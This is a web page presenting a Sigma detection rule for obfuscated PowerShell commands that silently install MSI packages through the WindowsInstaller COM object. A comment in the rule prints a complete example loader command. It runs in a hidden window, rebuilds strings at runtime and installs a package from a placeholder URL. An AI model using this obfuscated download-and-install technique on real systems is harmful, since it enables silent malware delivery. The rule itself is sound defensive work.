Obfuscated PowerShell MSI Install via WindowsInstaller COM
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer).
The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of InstallProduct and COM object creation, particularly combined with
hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
Sigma rule (View on GitHub)
1title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
2id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
3status: experimental
4description: |
5 Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
6 The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
7 malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
8 by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
9 hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
10references:
11 - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
12 - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
13 - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
14author: Meroujan Antonyan (vx3r)
15date: 2025-05-27
16tags:
17 - attack.defense-evasion
18 - attack.t1027.010
19 - attack.t1218.007
20 - attack.execution
21 - attack.t1059.001
22logsource:
23 category: process_creation
24 product: windows
25detection:
26 # Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
27 selection_img:
28 - Image|endswith:
29 - '\powershell_ise.exe'
30 - '\powershell.exe'
31 - '\pwsh.exe'
32 - OriginalFileName:
33 - 'PowerShell_ISE.EXE'
34 - 'PowerShell.EXE'
35 - 'pwsh.dll'
36 selection_cli:
37 CommandLine|contains|all:
38 - '-ComObject'
39 - 'InstallProduct('
40 - '.Insert('
41 - 'UILevel'
42 condition: all of selection_*
43falsepositives:
44 - Unknown
45level: high
References
-
Amber Albatross continues its reign and Latrodectus crawls into the top 10 in this month's edition of Intelligence Insights
Read More -
Related rules
- Powershell Executed From Headless ConHost Process
- Obfuscated PowerShell OneLiner Execution
- Custom Cobalt Strike Command Execution
- Potential BlackByte Ransomware Activity
- Remote Thread Creation Via PowerShell In Uncommon Target